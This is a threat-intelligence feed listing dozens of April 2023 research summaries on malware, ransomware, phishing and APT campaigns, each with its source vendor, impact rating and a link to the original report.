- Intel Source:
- Fortinet
- Intel Name:
- The_Examination_of_EvilExtractor_Tool
- Date of Scan:
- 2023-04-22
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs researchers have analyzed the EvilExtractor tool which is an attack tool designed to target Windows operating systems and extract data and files from endpoint devices. Also, observed this malware in a phishing email campaign on 30 March.
Source:
https://www.fortinet.com/blog/threat-research/evil-extractor-all-in-one-stealer
—
- Intel Source:
- Sophos
- Intel Name:
- Two_New_QakBot_C2_Servers_Detected
- Date of Scan:
- 2023-04-22
- Impact:
- LOW
- Summary:
- Sophos researchers have detected two new QakBot servers that have not yet been publicly identified. These servers are used by threat actors to manage and control QakBot infections, a banking trojan that has been active since 2008 and primarily targets financial institutions and their customers.
Source:
https://news.sophos.com/en-us/2023/04/20/new-qakbot-c2-servers-detected-with-sophos-ndr/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Lazarus_Hackers_Pushing_Linux_Malware_via_Fake_Job_Offers
- Date of Scan:
- 2023-04-22
- Impact:
- MEDIUM
- Summary:
- Researchers from Welivesecurity identified a new Lazarus campaign considered part of “Operation DreamJob” has been discovered targeting Linux users with malware for the first time.
—
- Intel Source:
- Google Blog
- Intel Name:
- Russian_Hackers_Conducting_Phishing_Attacks_in_Ukraine
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Google Threat Analysis researchers have observed that Russian government-backed phishing campaigns targeted users in Ukraine the most, with the country accounting for over 60% of observed Russian targeting.
Source:
https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/
—
- Intel Source:
- Team-Cymru
- Intel Name:
- SideCopy_Attack_Chain_Deploying_AllaKore_RAT
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Researchers from Team-Cymru have analyzed the SideCopy group and discovered the SideCopy attack chain used to deploy AllaKore RAT. It is an open-source remote access tool that has been modified for the purposes of SideCopy operations and is commonly observed in their intrusions.
Source:
https://www.team-cymru.com/post/allakore-d-the-sidecopy-train
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_the_BlackBit_ransomware
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has recently discovered the distribution of the BlackBit ransomware disguised as svchost.exe during the team’s monitoring. According to the ASEC’s internal infrastructure, the BlackBit ransomware has been continuously distributed
—
- Intel Source:
- Threatmon
- Intel Name:
- New_Attack_Chain_Uncovered_From_Blind_Eagle_Cyber_Espionage_Group
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Researchers from Threatmon have observed that the cyber espionage actor tracked as Blind Eagle has been linked to a new multi-stage attack chain that leads to the deployment of the NjRAT remote access trojan on compromised systems.
Source:
https://threatmon.io/apt-blind-eagles-malware-arsenal-technical-analysis/
—
- Intel Source:
- Secureworks
- Intel Name:
- Bumblebee_Malware_Distributing_Via_Trojanized_Installer_Downloads
- Date of Scan:
- 2023-04-21
- Impact:
- MEDIUM
- Summary:
- https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads
Source:
https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads
—
- Intel Source:
- NTT Security
- Intel Name:
- USB_Based_FlowCloud_Malware_Attacks
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Researchers from NTT security have observed several companies have been infected with FlowCloud. It is known as malware used by an attack group called TA410 and has been observed since around 2019.
Source:
https://insight-jp.nttsecurity.com/post/102id0t/usbflowcloud
—
- Intel Source:
- Symantec
- Intel Name:
- Play_Ransomware_Group_Using_New_Custom_Data_Gathering_Tools
- Date of Scan:
- 2023-04-21
- Impact:
- MEDIUM
- Summary:
- Symantec researchers have identified that the Play ransomware group is using two new, custom-developed tools that allow it to enumerate all users and computers on a compromised network, and copy files from the Volume Shadow Copy Service (VSS) that are normally locked by the operating system.
—
- Intel Source:
- Sucuri
- Intel Name:
- Hackers_Using_Abandoned_WordPress_Plugins_to_Backdoor_Websites
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Sucuri researchers have identified that attackers are using Eval PHP, an outdated legitimate WordPress plugin, to compromise websites by injecting stealthy backdoors.
Source:
https://blog.sucuri.net/2023/04/massive-abuse-of-abandoned-evalphp-wordpress-plugin.html
—
- Intel Source:
- Sophos
- Intel Name:
- EDR_Killer_AuKill_Exploiting_Process_Explorer_Drivers
- Date of Scan:
- 2023-04-21
- Impact:
- MEDIUM
- Summary:
- Sophos researchers have investigated multiple incidents where attackers attempted to disable EDR clients with a new defense evasion tool dubbed AuKill. The AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying either a backdoor or ransomware on the target system.
Source:
https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/
—
- Intel Source:
- CSIRT-MON
- Intel Name:
- Belarus_Linked_Hacking_Group_Targeting_Poland_With_New_Disinformation_Campaign
- Date of Scan:
- 2023-04-21
- Impact:
- MEDIUM
- Summary:
- CSIRT-MON researchers have issued a warning Wednesday about a recent disinformation campaign that has been traced back to the Belarusian hacking group known as Ghostwriter.
Source:
https://csirt-mon.wp.mil.pl/pl/articles/6-aktualnosci/dezinformacja-o-rekrutacji-do-litpolukrbrig/
—
- Intel Source:
- Symantec
- Intel Name:
- Daggerfly_APT_Group_Targeting_Telecoms_Company_in_Africa
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Researchers from Symantec have identified that Telecommunication services providers in Africa are the target of a new campaign orchestrated by a China-linked threat actor at least since November 2022.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Hackers_Promptly_Adopting_Web3_IPFS_Technology
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- PaloAlto researchers have observed several types of cyberthreats using InterPlanetary File System (aka IPFS), including phishing, credential theft, command and control (C2) communications, and malicious payload distribution. Also, observed a significant jump in IPFS-related traffic at the beginning of 2022.
Source:
https://unit42.paloaltonetworks.com/ipfs-used-maliciously/
—
- Intel Source:
- Blackberry
- Intel Name:
- Google_Ads_Abuse_and_Spear_Phishing_Campaigns_Impersonating_Spains_Tax_Agency
- Date of Scan:
- 2023-04-20
- Impact:
- LOW
- Summary:
- Researchers from BlackBerry have observed two parallel malicious campaigns that use the same infrastructure but have different purposes. The first campaign is related to a malvertising Google Ads Platform and the second campaign is related to a massive spear-phishing campaign targeting large organizations based in Spain. The campaign impersonated Spain’s tax agency, with the goal of harvesting the email credentials of companies in Spain.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Strain_of_Ransomware_Named_CrossLock
- Date of Scan:
- 2023-04-20
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered a new strain of ransomware called CrossLock, which is written in the programming language “Go”. It employs the double-extortion technique to increase the likelihood of payment from its victims and this technique involves encrypting the victim’s data as well as exfiltrating it from their system.
—
- Intel Source:
- Uptycs
- Intel Name:
- Hackers_From_Pakistan_Using_Linux_Malware_Poseidon_to_Target_Indian_Government_Agencies
- Date of Scan:
- 2023-04-20
- Impact:
- MEDIUM
- Summary:
- Researchers from Uptycs have identified a Pakistan-based advanced persistent threat actor known as Transparent Tribe using a two-factor authentication (2FA) tool used by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon.
Source:
https://www.uptycs.com/blog/cyber_espionage_in_india_decoding_apt_36_new_linux_malware
—
- Intel Source:
- LOW
- Intel Name:
- Phishing_Campaign_Targeting_EPOS_Net_Customers
- Date of Scan:
- 2023-04-20
- Impact:
- LOW
- Summary:
- Cofense Phishing Defense Center have observed a sophisticated phishing campaign targeting EPOS Net customers, a large Japanese credit card company. The campaign is notable for its meticulously crafted emails and cloned website, as well as its use of official customer service numbers to establish an illusion of legitimacy.
—
- Intel Source:
- Morphisec
- Intel Name:
- The_Critical_Component_of_Aurora_Stealer_Attack_Delivery_Chain
- Date of Scan:
- 2023-04-19
- Impact:
- LOW
- Summary:
- Morphisec researchers have observed the component that makes Aurora’s delivery stealthy and dangerous is a highly evasive loader named “in2al5d p3in4er.” It is compiled with Embarcadero RAD Studio and targets endpoint workstations using advanced anti-VM (virtual machine) techniques.
—
- Intel Source:
- Zscaler
- Intel Name:
- A_New_Backdoor_Called_Devopt
- Date of Scan:
- 2023-04-19
- Impact:
- LOW
- Summary:
- Zscaler ThreatLabz researchers have identified a new backdoor called ‘Devopt’. It utilizes hard-coded names for persistence and offers several functionalities, including keylogging, stealing browser credentials, clipper, and more. Multiple versions of the backdoor have surfaced in just the last few days, indicating that it is still in development.
Source:
https://www.zscaler.com/blogs/security-research/introducing-devopt-multifunctional-backdoor-arsenal
—
- Intel Source:
- Microsoft
- Intel Name:
- Attacking_High_Value_Targets_With_Mint_Sandstorm
- Date of Scan:
- 2023-04-19
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have observed a mature subgroup of Mint Sandstorm, an Iranian nation-state actor previously tracked as PHOSPHORUS, refining its tactics, techniques, and procedures (TTPs). Specifically, this subset has rapidly weaponized N-day vulnerabilities in common enterprise applications and conducted highly-targeted phishing campaigns to quickly and successfully access environments of interest.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Gamaredon_Groups_Automated_Spear_Phishing_Campaigns_Revealed_by_Exposed_Web_Panel
- Date of Scan:
- 2023-04-18
- Impact:
- MEDIUM
- Summary:
- EclecticIQ researchers have identified a spear phishing campaign targeting Ukrainian government entities like the Foreign Intelligence Service of Ukraine (SZRU) and the Security Service of Ukraine (SSU), likely conducted by APT group Gamaredon.
—
- Intel Source:
- Group-IB
- Intel Name:
- Hackers_From_Iran_Leveraging_SimpleHelp_Remote_Support_Software_for_Persistent_Access
- Date of Scan:
- 2023-04-18
- Impact:
- MEDIUM
- Summary:
- Researchers from Group-IB have identified that the Iranian threat actor known as MuddyWater is continuing its time-tested tradition of relying on legitimate remote administration tools to commandeer targeted systems.
Source:
https://www.group-ib.com/blog/muddywater-infrastructure/
—
- Intel Source:
- ASEC
- Intel Name:
- Trigona_Ransomware_Attacking_MS_SQL_Servers
- Date of Scan:
- 2023-04-18
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have discovered the Trigona ransomware is installed on poorly managed MS-SQL servers and typical attacks include brute force attacks and dictionary attacks to systems where account credentials are poorly being managed.
—
- Intel Source:
- ASEC
- Intel Name:
- The_Activities_of_Tick_Group
- Date of Scan:
- 2023-04-18
- Impact:
- LOW
- Summary:
- Researchers from ASEC have continued to track Tick group activities as it is targeting government agencies, the military, and various industries in Korea and Japan for over a decade.
—
- Intel Source:
- Securelist
- Intel Name:
- QBot_Banker_Delivering_Via_Business_Correspondence
- Date of Scan:
- 2023-04-18
- Impact:
- LOW
- Summary:
- Securelist researchers have observed a significant increase in attacks that use banking Trojans of the QBot family. The malware is delivered through e-mail letters written in different languages — variations of them were coming in English, German, Italian, and French. The messages were based on real business letters the attackers had gotten access to, which afforded them the opportunity to join the correspondence thread with messages of their own.
Source:
https://securelist.com/qbot-banker-business-correspondence/109535/
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Examination_of_BabLock_Ransomware
- Date of Scan:
- 2023-04-18
- Impact:
- LOW
- Summary:
- TrendMicro researchers have analyzed stealthy and expeditious ransomware called BabLock (aka Rorschach). It has recently been making waves due to its sophisticated and fast-moving attack chain that uses subtle yet effective techniques.
Source:
https://www.trendmicro.com/en_us/research/23/d/an-analysis-of-the-bablock-ransomware.html
—
- Intel Source:
- NTT Security
- Intel Name:
- Fraudulent_Campaign_Using_Fake_Google_Chrome_Error_to_Spread_Malware
- Date of Scan:
- 2023-04-17
- Impact:
- LOW
- Summary:
- Researchers from NTT security have observed an attack campaign distributing malware from a web page disguised as a Google Chrome error message since around November 2022. It has become active since around February 2023, and the attacks have been confirmed in a very wide area, so close attention is required.
—
- Intel Source:
- Uptycs
- Intel Name:
- Zaraza_Bot_Credential_Stealer_Targeting_Browser_Passwords
- Date of Scan:
- 2023-04-17
- Impact:
- LOW
- Summary:
- Researchers from Uptycs team have identified a new variant of credential stealing malware, dubbed Zaraza bot, which is using telegram as its command and control and It is the Russian word for infection.
Source:
https://www.uptycs.com/blog/zaraza-bot-credential-password-stealer
—
- Intel Source:
- Fortinet
- Intel Name:
- An_Overview_of_Tax_Scammers
- Date of Scan:
- 2023-04-17
- Impact:
- MEDIUM
- Summary:
- Fortinet researchers have analyzed a few examples of malware that take advantage of tax season. Attackers make every attempt to scam taxpayers for financial gain and data exfiltration for future attacks.
Source:
https://www.fortinet.com/blog/threat-research/tax-scammers-at-large
—
- Intel Source:
- ZScaler
- Intel Name:
- The_Analysis_of_Trigona_Ransomware
- Date of Scan:
- 2023-04-17
- Impact:
- LOW
- Summary:
- Zscaler researchers have analyzed the Trigona ransomware. It is written in the Delphi programming language that has been active since at least June 2022.
Source:
https://www.zscaler.com/blogs/security-research/technical-analysis-trigona-ransomware
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- Threat_Actors_From_Conti_and_FIN7_Collaborate_With_Domino_Backdoor
- Date of Scan:
- 2023-04-17
- Impact:
- MEDIUM
- Summary:
- Researchers from IBM security have discovered a new malware family called Domino that is created by developers associated with the cybercriminal group that X-Force tracks as ITG14, also known as FIN7.
Source:
https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor/
—
- Intel Source:
- Malware Hunter
- Intel Name:
- LockBit_Encryptor_Targeting_macOS_System
- Date of Scan:
- 2023-04-17
- Impact:
- MEDIUM
- Summary:
- Researchers from Malware Hunter team have warned that the LockBit ransomware gang has developed encryptors to target macOS devices.
Source:
https://twitter.com/malwrhunterteam/status/1647384505550876675
—
- Intel Source:
- Ciberdefensa
- Intel Name:
- Bitter_Group_CHM_malware_distribution
- Date of Scan:
- 2023-04-16
- Impact:
- LOW
- Summary:
- The Bitter group has been distributing CHM malware to certain Chinese organizations through compressed email attachments with filenames such as “Project Plan 2023.chm”. When executed, the CHM files display content related to Chinese and Russian organizations and activate a malicious script that executes additional malware.
—
- Intel Source:
- Yoroi
- Intel Name:
- Money_Ransomware
- Date of Scan:
- 2023-04-16
- Impact:
- LOW
- Summary:
- The article discusses the Money Ransomware group, which utilizes a double extortion model by encrypting data and exfiltrating sensitive information, threatening to publish the data unless a ransom is paid.
Source:
https://yoroi.company/research/money-ransomware-the-latest-double-extortion-group/?&web_view=true
—
- Intel Source:
- Sophos
- Intel Name:
- Malware_Attacks_on_Tax_Firms
- Date of Scan:
- 2023-04-15
- Impact:
- LOW
- Summary:
- Sophos researchers have observed that a threat actor is targeting Financial accountant firms and CPAs with an attack that combines social engineering with a novel exploit against Windows computers to deliver malware called GuLoader.
Source:
https://news.sophos.com/en-us/2023/04/13/tax-firms-targeted-by-precision-malware-attacks/
—
- Intel Source:
- Microsoft
- Intel Name:
- Threat_Actors_Try_to_Wreak_Havoc_on_Tax_Day
- Date of Scan:
- 2023-04-15
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have observed phishing attacks targeting accounting and tax return preparation firms to deliver the Remcos remote access trojan (RAT) and compromise target networks beginning in February of this year.
—
- Intel Source:
- Trellix
- Intel Name:
- The_Activity_of_Emerging_Cybercriminal_Group_Named_Read_The_Manual_RTM_Locker
- Date of Scan:
- 2023-04-15
- Impact:
- LOW
- Summary:
- Researchers from Trellix have detailed the tactics, techniques, and procedures of an emerging cybercriminal gang called ‘Read The Manual RTM Locker. The group provides a ransomware-as-a-service (RaaS) and provides its malicious code to a network of affiliates by imposing strict rules.
—
- Intel Source:
- ASEC
- Intel Name:
- Bitter_Group_Distributing_CHM_Malware_to_Chinese_Organizations
- Date of Scan:
- 2023-04-14
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified multiple circumstances of the group distributing CHM malware to certain Chinese organizations. The files used in the recent attack are distributed as attachments to emails as compressed files. The compressed files contain a CHM file with different filenames.
—
- Intel Source:
- CADO
- Intel Name:
- New_Legion_Hacktool_Stealing_Credentials_From_Misconfigured_Sites
- Date of Scan:
- 2023-04-14
- Impact:
- MEDIUM
- Summary:
- CADO Security researchers have identified a new Python-based credential harvester and SMTP hijacking tool named ‘Legion’ that is being sold on Telegram that targets online email services for phishing and spam attacks.
Source:
https://www.cadosecurity.com/legion-an-aws-credential-harvester-and-smtp-hijacker/
—
- Intel Source:
- CERT-PL
- Intel Name:
- Russian_Hackers_Targeting_NATO_and_EU
- Date of Scan:
- 2023-04-14
- Impact:
- MEDIUM
- Summary:
- Researchers from The Military Counterintelligence Service and the CERT Polska team have observed a widespread espionage campaign linked to Russian intelligence services and targeting NATO and EU.
Source:
https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services
—
- Intel Source:
- Sentinelone
- Intel Name:
- APT36_Group_Targeting_Indian_Education_Sector
- Date of Scan:
- 2023-04-14
- Impact:
- MEDIUM
- Summary:
- Researchers from SentinelOne have identified a cluster of malicious Office documents that distribute Crimson RAT, used by the APT36 group (also known as Transparent Tribe) targeting the education sector.
—
- Intel Source:
- ASEC
- Intel Name:
- Qakbot_Distributing_via_Email_Hijacking
- Date of Scan:
- 2023-04-13
- Impact:
- LOW
- Summary:
- ASEC Lab researchers have identified circumstances of Qakbot malware is distributing via malicious PDF files attached to forwarded or replies to existing emails.
—
- Intel Source:
- Esentire
- Intel Name:
- GuLoader_Targeting_the_Financial_Sector_Using_a_Taxthemed_Phishing_Lure
- Date of Scan:
- 2023-04-13
- Impact:
- MEDIUM
- Summary:
- Researchers from Esentire have observed GuLoader targeting the financial sector via the phishing email using a tax-themed lure. The phishing email contains a shared link to Adobe Acrobat, where the user can download the password-protected ZIP archive.
—
- Intel Source:
- Tehtris
- Intel Name:
- Color1337_Cryptojacking_Campaign_Targeting_Linux_Machines
- Date of Scan:
- 2023-04-13
- Impact:
- LOW
- Summary:
- Researchers from Tehtris have identified a cryptojacking campaign, believed to have originated from Romania, and targeting Linux machines. This campaign, dubbed Color1337, leverages a botnet to mine Monero and the botnet can propagate itself to other machines across the network.
Source:
https://tehtris.com/en/blog/linux-focus-on-a-cryptomining-attack-dubbed-color1337
—
- Intel Source:
- Securinfra
- Intel Name:
- Chinese_Hacking_Group_Targeting_European_Governments_and_Businesses
- Date of Scan:
- 2023-04-13
- Impact:
- HIGH
- Summary:
- Researchers from Securinfra have observed that Chinese APT groups are targeting European governments and businesses. Recently, European Union Agency for Cybersecurity (ENISA) and CERT-EU warned about malicious activities against EU governments and businesses attributed to Chinese Advanced Persistent Threat (APT) groups.
—
- Intel Source:
- Esentire
- Intel Name:
- Raise_in_Qakbot_Malware_Incidents
- Date of Scan:
- 2023-04-13
- Impact:
- LOW
- Summary:
- Researchers from Esentire have observed a significant increase in Qakbot incidents impacting various industries.
Source:
https://www.esentire.com/security-advisories/increase-in-observations-of-qakbot-malware
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_Analyses_April_03rd_April_09th_2023
- Date of Scan:
- 2023-04-13
- Impact:
- LOW
- Summary:
- ASEC researchers have analyzed the malware and found backdoor ranked top with 61.1%, followed by Infostealer with 20.8%, downloader with 16.9%, and ransomware with 1.1%.
—
- Intel Source:
- Netscope
- Intel Name:
- DigitalOceans_Tech_Support_Scam_Shifts_to_StackPaths_CDN
- Date of Scan:
- 2023-04-13
- Impact:
- MEDIUM
- Summary:
- Netskope researchers have identified that attackers previously abusing DigitalOcean to host a tech support scam have expanded the operation, now abusing StackPath CDN to distribute the scam, and are likely to start abusing additional cloud services to deliver the scam in the near future.
Source:
https://www.netskope.com/pt/blog/tech-support-scam-pivots-from-digitalocean-to-stackpath-cdn
—
- Intel Source:
- Securelist
- Intel Name:
- Attacks_With_Nokoyawa_Ransomware_Using_ZeroDay_Vulnerabilities_in_Windows
- Date of Scan:
- 2023-04-12
- Impact:
- MEDIUM
- Summary:
- Securelist researchers have analyzed the CVE-2023-28252 zero-day vulnerability in Common Log File System (CLFS).
Source:
https://securelist.com/nokoyawa-ransomware-attacks-with-windows-zero-day/109483/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Recent_Activity_of_IcedID
- Date of Scan:
- 2023-04-12
- Impact:
- LOW
- Summary:
- Researchers from SANS have observed that IcedID (Bokbot) is distributing through thread-hijacked emails with PDF attachments. The PDF files have links that redirect to Google Firebase Storage URLs hosting password-protected zip archives and the password for the downloaded zip archive is shown in the PDF file.
—
- Intel Source:
- Sygnia
- Intel Name:
- The_Attack_Flow_of_RagnarLocker_Ransomware
- Date of Scan:
- 2023-04-12
- Impact:
- LOW
- Summary:
- Researchers from Sygnia have analyzed the attack flow of RagnarLocker ransomware. It is both the name of a ransomware strain and of a criminal group that develops and operates it. Their data leakage blog appeared in April 2020, but although they’re an experienced group, RagnarLocker never made it to the top 10 ransomware strains.
Source:
https://blog.sygnia.co/threat-actor-spotlight-ragnarlocker-ransomware
—
- Intel Source:
- JFrog
- Intel Name:
- Analyzing_Impala_Stealer
- Date of Scan:
- 2023-04-12
- Impact:
- LOW
- Summary:
- Reserachers from JFrog provided a detailed analysis of a malicious payload named “Impala Stealer”, a custom crypto stealer which was used as the payload for the NuGet malicious packages campaign. The sophisticated campaign targeted .NET developers via NuGet malicious packages, and the JFrog Security team was able to detect and report it as part of their regular activity of exposing supply chain attacks.
Source:
https://jfrog.com/blog/impala-stealer-malicious-nuget-package-payload/
—
- Intel Source:
- Securelist
- Intel Name:
- The_Development_and_Refinement_of_DeathNote_Campaign_TTPs
- Date of Scan:
- 2023-04-12
- Impact:
- MEDIUM
- Summary:
- Researchers from Securelist have focused on an active cluster that is dubbed DeathNote because the malware responsible for downloading additional payloads is named Dn.dll or Dn64.dll. This threat is also known as Operation DreamJob or NukeSped.
Source:
https://securelist.com/the-lazarus-group-deathnote-campaign/109490/
—
- Intel Source:
- ISC. SANS
- Intel Name:
- The_textwrap_wrap_function
- Date of Scan:
- 2023-04-12
- Impact:
- LOW
- Summary:
- Didier Stevens, Senior handler from Microsoft MVP discovered that the textwrap.wrap function he used in diary entry “String Obfuscation: Character Pair Reversal” does not always group characters as he expected. He released an update of his python-per-line.py tool, including a Reverse function. And also some simple brute-forcing.
Source:
https://isc.sans.edu/diary/Extra+String+Obfuscation+Character+Pair+Reversal/29656
—
- Intel Source:
- Fortinet
- Intel Name:
- Malicious_Document_From_Ukraines_Energoatom_Delivering_Havoc_Demon_Backdoor
- Date of Scan:
- 2023-04-12
- Impact:
- LOW
- Summary:
- FortiGuard Labs researchers have identified a malicious spoofed document pretending to be from the Ukrainian company, Energoatom, a state-owned enterprise that operates Ukraine’s nuclear power plants.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- The_Analysis_of_Malicious_HTA_File
- Date of Scan:
- 2023-04-12
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed the malicious HTA file.
Source:
https://isc.sans.edu/diary/Another+Malicious+HTA+File+Analysis+Part+2/29676/
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_discovery_of_three_vulnerabilities_in_the_Microsoft_Message_Queuing_service_MSMQ
- Date of Scan:
- 2023-04-12
- Impact:
- HIGH
- Summary:
- Check Point reserachers recently observed three new vulnerabilities in the “Microsoft Message Queuing” service, known as MSMQ. These vulnerabilities were disclosed to Microsoft and patched in the April Patch Tuesday update. The most severe of these, dubbed QueueJumper by CPR (CVE-2023-21554), is a critical vulnerability that could allow unauthorized attackers to remotely execute arbitrary code in the context of the Windows service process mqsvc.exe.
—
- Intel Source:
- NTT Security
- Intel Name:
- An_attack_campaign_distributing_malware_disguised_as_a_Google_Chrome
- Date of Scan:
- 2023-04-12
- Impact:
- LOW
- Summary:
- Since around November 2022, SOC has been observing an attack campaign distributing malware from a web page disguised as a Google Chrome error screen. It became active from around February 2023, and malware downloads have been confirmed in a very wide range, so it is necessary to be careful. This article provides an overview of the attack campaign and the malware.
Source:
https://insight-jp.nttsecurity.com/post/102ic6o/webgoogle-chrome
—
- Intel Source:
- Securelist
- Intel Name:
- Gopuram_backdoor_deployed_through_3CX_supply_chain_attack
- Date of Scan:
- 2023-04-11
- Impact:
- MEDIUM
- Summary:
- On March 29, Crowdstrike posted their report about a supply chain attack conducted via 3CXDesktopApp. They analyzed the attack and shared their findings. They observed few victims compromised with Gopuram, but the number of infections began to increase in March 2023. As it turned out, the increase was directly related to the 3CX supply chain attack.
Source:
https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/
—
- Intel Source:
- Trustwave
- Intel Name:
- A_new_strain_of_malware_Rilide_targets_Chromium_based_browsers
- Date of Scan:
- 2023-04-11
- Impact:
- LOW
- Summary:
- Trustwave SpiderLabs observed a new strain of malware that was named as Rilide and targets Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, and Opera. Rilide malware is pretending as a legitimate Google Drive extension and lets threat actors to carry out a big range of malicious activities, including monitoring browsing history, taking screenshots, and injecting malicious scripts to withdraw funds from various cryptocurrency exchanges.
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_CryptoClippy_malware_campaign_targets_Portuguese_speakers
- Date of Scan:
- 2023-04-11
- Impact:
- LOW
- Summary:
- Unit 42 recently observed a malware campaign targeting Portuguese speakers and redirect cryptocurrency from legitimate users’ wallets and controlled by threat actors. The campaign uses a malware known as a cryptocurrency clipper, which monitors the victim’s clipboard for signs that a cryptocurrency wallet address is being copied.
Source:
https://unit42.paloaltonetworks.com/crypto-clipper-targets-portuguese-speakers/
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_analyses_March_26_April_1_2023
- Date of Scan:
- 2023-04-11
- Impact:
- LOW
- Summary:
- ASEC lab researchers continiusly monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from March 26th, 2023 to April 1st, 2023 and provide statistical information on each type.
—
- Intel Source:
- Checkmarx
- Intel Name:
- Hackers_Flooding_NPM_With_Fake_Packages_Causing_DoS_Attack
- Date of Scan:
- 2023-04-11
- Impact:
- LOW
- Summary:
- Researchers from Checkmarx security have identified that hackers flooding the npm open source package repository for Node.js with bogus packages that briefly even resulted in a denial-of-service (DoS) attack.
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_Deep_Analysis_Report_on_SarinLocker_Ransomware
- Date of Scan:
- 2023-04-11
- Impact:
- LOW
- Summary:
- Cyfirma researchers have deeply analyzed a new ransomware called SarinLocker. The group has started a ransomware affiliate program that provides attackers with ransomware and affiliate software to manage victims.
Source:
https://www.cyfirma.com/outofband/sarinlocker-ransomware/
—
- Intel Source:
- Sucuri
- Intel Name:
- WordPress_Infection_Campaign_Leveraging_Recently_Discovered_Theme_and_Plugin_Vulnerabilities
- Date of Scan:
- 2023-04-10
- Impact:
- LOW
- Summary:
- Researchers from Sucuri have tracked a massive WordPress infection campaign since 2017. Typically, they refer to it as an ongoing long lasting massive WordPress infection campaign that leverages all known and recently discovered theme and plugin vulnerabilities.
—
- Intel Source:
- Microsoft
- Intel Name:
- Ransomware_Based_Attacks_Carried_Out_by_Iranian_Hackers
- Date of Scan:
- 2023-04-10
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have identified the Iranian nation-state group known as MuddyWater has been observed carrying out destructive attacks on hybrid environments under the guise of a ransomware operation.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Ransomware_Group_Named_Money_Message
- Date of Scan:
- 2023-04-10
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered a new ransomware group named Money Message. It can encrypt network shares and targets both Windows and Linux operating systems.
Source:
https://blog.cyble.com/2023/04/06/demystifying-money-message-ransomware/\
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_analyses_March_19_25th_2023
- Date of Scan:
- 2023-04-10
- Impact:
- LOW
- Summary:
- ASEC lab researchers continiusly monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from March 19th, 2023 to March 25th, 2023 and provide statistical information on each type.
—
- Intel Source:
- Trellix
- Intel Name:
- Royal_Ransom_analyses
- Date of Scan:
- 2023-04-06
- Impact:
- LOW
- Summary:
- Trellix Advanced Cyber Services team within Trellix Professional Services provided updated incident response-related data.
Source:
https://www.trellix.com/en-us/about/newsroom/stories/research/a-royal-analysis-of-royal-ransom.html
—
- Intel Source:
- Trellix
- Intel Name:
- The_functions_of_Genesis_Market
- Date of Scan:
- 2023-04-06
- Impact:
- LOW
- Summary:
- Trellix was approached by law enforcment asking for assistance with the analyses of Genesis Market. Trellix have analyzed and explained the function and operations of Genesis Market, as well as provided an analysis of malware samples that law enforcement shared with Trellix, advice and guidance to (potential) victims.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_statistics_March_27_April_2_2023
- Date of Scan:
- 2023-04-06
- Impact:
- LOW
- Summary:
- ASEC lab researchers continiusly monitor malware threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post lists weekly statistics collected from March 27th, 2023 (Monday) to April 2nd, 2023 (Sunday).
—
- Intel Source:
- ISC. SANS
- Intel Name:
- The_efile_com_analyses
- Date of Scan:
- 2023-04-06
- Impact:
- LOW
- Summary:
- Johannes B. Ullrich, Ph.D. , Dean of Research from SANS.edu analyzed the efile.com Malware “efail” which serving malicious ake “Browser Updates” to some of its users. Johannes B. Ulrich could retrieve some of the malware last evening before it was removed. The attack uses two main executables. The first one, “update.exe,” is a simple downloader downloading and executing the second part. The second part is a PHP script communicating with the command and control server. Its main function is to download and execute additional code as instructed to do so. During the installation, basic system information is sent to the attacker, and the backdoor is made persistent via scheduled/on-boot registry entries.
Source:
https://isc.sans.edu/diary/Analyzing+the+efilecom+Malware+efail/29712/#comments
—
- Intel Source:
- Trustwave
- Intel Name:
- Emotet_Resumed_its_Spamming_Activities
- Date of Scan:
- 2023-04-06
